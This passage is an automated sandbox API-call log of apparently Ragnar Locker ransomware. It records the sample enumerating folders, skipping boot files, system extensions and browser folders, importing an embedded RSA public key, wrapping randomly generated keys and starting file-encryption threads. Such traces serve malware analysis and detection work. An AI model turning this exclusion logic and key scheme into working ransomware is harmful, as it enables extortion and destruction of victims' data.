ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0168.692] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0168.692] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0168.692] FindNextFileW (in: hFindFile=0x3547cc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0168.692] FindClose (in: hFindFile=0x3547cc0 | out: hFindFile=0x3547cc0) returned 1 [0168.795] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547cc0 [0168.796] FindNextFileW (in: hFindFile=0x3547cc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf1e35ed3, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xf1e35ed3, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0168.798] FindNextFileW (in: hFindFile=0x3547cc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1e2d70e, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf1e2d70e, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0168.798] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1025\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0168.798] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="!$R4GN4R_B8CF767A$!.txt") returned="!$R4GN4R_B8CF767A$!.txt" [0168.798] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1025\\!$R4GN4R_B8CF767A$!.txt") returned=".txt" [0168.798] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 0 [0168.798] FindNextFileW (in: hFindFile=0x3547cc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x1d8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0168.798] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1025\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0168.798] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="eula.rtf" | out: lpString1="eula.rtf") returned="eula.rtf" [0168.798] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf") returned=".rtf" [0168.798] lstrcmpiW (lpString1="eula.rtf", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0168.798] lstrcmpiW (lpString1="eula.rtf", lpString2="autorun.inf") returned 1 [0168.798] lstrcmpiW (lpString1="eula.rtf", lpString2="boot.ini") returned 1 [0168.798] lstrcmpiW (lpString1="eula.rtf", lpString2="bootfont.bin") returned 1 [0168.798] lstrcmpiW (lpString1="eula.rtf", lpString2="bootsect.bak") returned 1 [0168.798] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr") returned 1 [0168.798] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr.efi") returned 1 [0168.798] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgfw.efi") returned 1 [0168.799] lstrcmpiW (lpString1="eula.rtf", lpString2="desktop.ini") returned 1 [0168.799] lstrcmpiW (lpString1="eula.rtf", lpString2="iconcache.db") returned -1 [0168.799] lstrcmpiW (lpString1="eula.rtf", lpString2="ntldr") returned -1 [0168.799] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat") returned -1 [0168.799] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat.log") returned -1 [0168.799] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.ini") returned -1 [0168.799] lstrcmpiW (lpString1="eula.rtf", lpString2="thumbs.db") returned -1 [0168.799] lstrcmpiW (lpString1=".rtf", lpString2=".db") returned 1 [0168.799] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0168.799] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0168.799] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0168.799] lstrcmpiW (lpString1=".rtf", lpString2=".msi") returned 1 [0168.799] lstrcmpiW (lpString1=".rtf", lpString2=".drv") returned 1 [0168.799] lstrcmpiW (lpString1=".rtf", lpString2=".exe") returned 1 [0168.799] GetProcessHeap () returned 0x3520000 [0168.799] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x5d10050 [0168.801] lstrcpyW (in: lpString1=0x5d10450, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf" [0168.801] FindNextFileW (in: hFindFile=0x3547cc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x121e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0168.801] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1025\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0168.802] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="LocalizedData.xml" | out: lpString1="LocalizedData.xml") returned="LocalizedData.xml" [0168.802] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned=".xml" [0168.802] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0168.802] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="autorun.inf") returned 1 [0168.802] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="boot.ini") returned 1 [0168.802] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootfont.bin") returned 1 [0168.802] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootsect.bak") returned 1 [0168.802] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr") returned 1 [0168.802] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr.efi") returned 1 [0168.802] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgfw.efi") returned 1 [0168.802] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="desktop.ini") returned 1 [0168.802] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="iconcache.db") returned 1 [0168.802] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntldr") returned -1 [0168.802] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat") returned -1 [0168.802] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat.log") returned -1 [0168.802] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.ini") returned -1 [0168.802] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="thumbs.db") returned -1 [0168.802] lstrcmpiW (lpString1=".xml", lpString2=".db") returned 1 [0168.802] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0168.802] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0168.803] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0168.803] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0168.803] lstrcmpiW (lpString1=".xml", lpString2=".drv") returned 1 [0168.803] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0168.803] GetProcessHeap () returned 0x3520000 [0168.803] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x5d1d1c8 [0168.803] lstrcpyW (in: lpString1=0x5d1d5c8, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" [0168.804] FindNextFileW (in: hFindFile=0x3547cc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0168.804] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1025\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0168.804] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="SetupResources.dll" | out: lpString1="SetupResources.dll") returned="SetupResources.dll" [0168.804] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned=".dll" [0168.804] lstrcmpiW (lpString1="SetupResources.dll", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0168.804] lstrcmpiW (lpString1="SetupResources.dll", lpString2="autorun.inf") returned 1 [0168.804] lstrcmpiW (lpString1="SetupResources.dll", lpString2="boot.ini") returned 1 [0168.804] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootfont.bin") returned 1 [0168.804] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootsect.bak") returned 1 [0168.804] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr") returned 1 [0168.804] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr.efi") returned 1 [0168.804] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgfw.efi") returned 1 [0168.804] lstrcmpiW (lpString1="SetupResources.dll", lpString2="desktop.ini") returned 1 [0168.804] lstrcmpiW (lpString1="SetupResources.dll", lpString2="iconcache.db") returned 1 [0168.804] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntldr") returned 1 [0168.804] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat") returned 1 [0168.804] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat.log") returned 1 [0168.804] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.ini") returned 1 [0168.804] lstrcmpiW (lpString1="SetupResources.dll", lpString2="thumbs.db") returned -1 [0168.804] lstrcmpiW (lpString1=".dll", lpString2=".db") returned 1 [0168.804] lstrcmpiW (lpString1=".dll", lpString2=".sys") returned -1 [0168.804] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0168.804] FindNextFileW (in: hFindFile=0x3547cc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0168.805] GetProcessHeap () returned 0x3520000 [0168.805] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x8) returned 0x357e308 [0168.805] CryptAcquireContextW (in: phProv=0x357e308, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x357e308*=0x3556dd0) returned 1 [0168.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 452 [0168.805] GetProcessHeap () returned 0x3520000 [0168.805] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x388) returned 0x35931a0 [0168.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x35931a0, cchWideChar=452 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n") returned 452 [0168.805] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0168.805] GetProcessHeap () returned 0x3520000 [0168.806] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x126) returned 0x3540c78 [0168.806] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x3540c78, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3540c78, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0168.806] GetProcessHeap () returned 0x3520000 [0168.806] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x35931a0 | out: hHeap=0x3520000) returned 1 [0168.806] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x3540c78, cbEncoded=0x126, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634 | out: pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634) returned 1 [0168.806] CryptImportPublicKeyInfo (in: hCryptProv=0x3556dd0, dwCertEncodingType=0x1, pInfo=0x35948f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3594920*, PublicKey.cbData=0x10e, PublicKey.pbData=0x3594928*, PublicKey.cUnusedBits=0x0), phKey=0x357e30c | out: phKey=0x357e30c*=0x3547e40) returned 1 [0168.806] GetProcessHeap () returned 0x3520000 [0168.807] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3540c78 | out: hHeap=0x3520000) returned 1 [0168.807] LocalFree (hMem=0x35948f0) returned 0x0 [0168.807] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x3556b28) returned 1 [0168.807] CryptGenRandom (in: hProv=0x3556b28, dwLen=0x28, pbBuffer=0x5d1cf74 | out: pbBuffer=0x5d1cf74) returned 1 [0168.807] CryptReleaseContext (hProv=0x3556b28, dwFlags=0x0) returned 1 [0168.807] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0168.810] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x3556b28) returned 1 [0168.811] CryptGenRandom (in: hProv=0x3556b28, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0168.811] CryptReleaseContext (hProv=0x3556b28, dwFlags=0x0) returned 1 [0168.811] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0168.813] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x3556990) returned 1 [0168.814] CryptGenRandom (in: hProv=0x3556990, dwLen=0x20, pbBuffer=0x5d1cf9c | out: pbBuffer=0x5d1cf9c) returned 1 [0168.814] CryptReleaseContext (hProv=0x3556990, dwFlags=0x0) returned 1 [0168.814] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0168.816] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x3556e58) returned 1 [0168.817] CryptGenRandom (in: hProv=0x3556e58, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0168.817] CryptReleaseContext (hProv=0x3556e58, dwFlags=0x0) returned 1 [0168.817] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0168.819] CryptEncrypt (in: hKey=0x3547e40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0168.820] GetLastError () returned 0x80090016 [0168.820] CryptEncrypt (in: hKey=0x3547e40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0168.820] GetLastError () returned 0x80090016 [0168.820] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x5d10050, dwCreationFlags=0x0, lpThreadId=0x5cfdd80 | out: lpThreadId=0x5cfdd80*=0x440) returned 0x384 [0168.821] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x35567f8) returned 1 [0168.821] CryptGenRandom (in: hProv=0x35567f8, dwLen=0x28, pbBuffer=0x5d2a0ec | out: pbBuffer=0x5d2a0ec) returned 1 [0168.822] CryptReleaseContext (hProv=0x35567f8, dwFlags=0x0) returned 1 [0168.822] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0168.824] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x3556b28) returned 1 [0168.824] CryptGenRandom (in: hProv=0x3556b28, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0168.824] CryptReleaseContext (hProv=0x3556b28, dwFlags=0x0) returned 1 [0168.824] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0168.827] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x3557188) returned 1 [0168.827] CryptGenRandom (in: hProv=0x3557188, dwLen=0x20, pbBuffer=0x5d2a114 | out: pbBuffer=0x5d2a114) returned 1 [0168.827] CryptReleaseContext (hProv=0x3557188, dwFlags=0x0) returned 1 [0168.827] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0168.829] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x3556b28) returned 1 [0168.830] CryptGenRandom (in: hProv=0x3556b28, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0168.830] CryptReleaseContext (hProv=0x3556b28, dwFlags=0x0) returned 1 [0168.830] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0168.834] CryptEncrypt (in: hKey=0x3547e40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2a134*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x5d2a134*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0168.834] GetLastError () returned 0x80090016 [0168.834] CryptEncrypt (in: hKey=0x3547e40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2a234*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x5d2a234*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0168.835] GetLastError () returned 0x80090016 [0168.835] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x5d1d1c8, dwCreationFlags=0x0, lpThreadId=0x5cfdd84 | out: lpThreadId=0x5cfdd84*=0x11e0) returned 0x3b4 [0168.835] WaitForMultipleObjects (nCount=0x2, lpHandles=0x5cfe0d0*=0x384, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0169.142] GetProcessHeap () returned 0x3520000 [0169.142] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x357e308 | out: hHeap=0x3520000) returned 1 [0169.143] CloseHandle (hObject=0x384) returned 1 [0169.143] GetProcessHeap () returned 0x3520000 [0169.143] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x5d10050 | out: hHeap=0x3520000) returned 1 [0169.143] CloseHandle (hObject=0x3b4) returned 1 [0169.143] GetProcessHeap () returned 0x3520000 [0169.144] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x5d1d1c8 | out: hHeap=0x3520000) returned 1 [0169.146] FindClose (in: hFindFile=0x3547cc0 | out: hFindFile=0x3547cc0) returned 1 [0169.147] FindNextFileW (in: hFindFile=0x3547bc0, lpFindFileData=0x5cfeb8c | out: lpFindFileData=0x5cfeb8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1028", cAlternateFileName="")) returned 1 [0169.147] lstrcmpiW (lpString1="1028", lpString2=".") returned 1 [0169.147] lstrcmpiW (lpString1="1028", lpString2="..") returned 1 [0169.147] lstrcmpiW (lpString1="1028", lpString2="Windows") returned -1 [0169.147] lstrcmpiW (lpString1="1028", lpString2="Windows.old") returned -1 [0169.147] lstrcmpiW (lpString1="1028", lpString2="Tor browser") returned -1 [0169.147] lstrcmpiW (lpString1="1028", lpString2="Internet Explorer") returned -1 [0169.148] lstrcmpiW (lpString1="1028", lpString2="Google") returned -1 [0169.148] lstrcmpiW (lpString1="1028", lpString2="Opera") returned -1 [0169.148] lstrcmpiW (lpString1="1028", lpString2="Opera Software") returned -1 [0169.148] lstrcmpiW (lpString1="1028", lpString2="Mozilla") returned -1 [0169.148] lstrcmpiW (lpString1="1028", lpString2="Mozilla Firefox") returned -1 [0169.148] lstrcmpiW (lpString1="1028", lpString2="$Recycle.Bin") returned 1 [0169.148] lstrcmpiW (lpString1="1028", lpString2="ProgramData") returned -1 [0169.148] lstrcmpiW (lpString1="1028", lpString2="All Users") returned -1 [0169.148] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\*.*", nBufferLength=0x104, lpBuffer=0x5cfe984, lpFilePart=0x5cff044 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\*.*", lpFilePart=0x5cff044*="*.*") returned 0x1d [0169.148] lstrcpyW (in: lpString1=0x5cfe9b8, lpString2="1028" | out: lpString1="1028") returned="1028" [0169.148] lstrcatW (in: 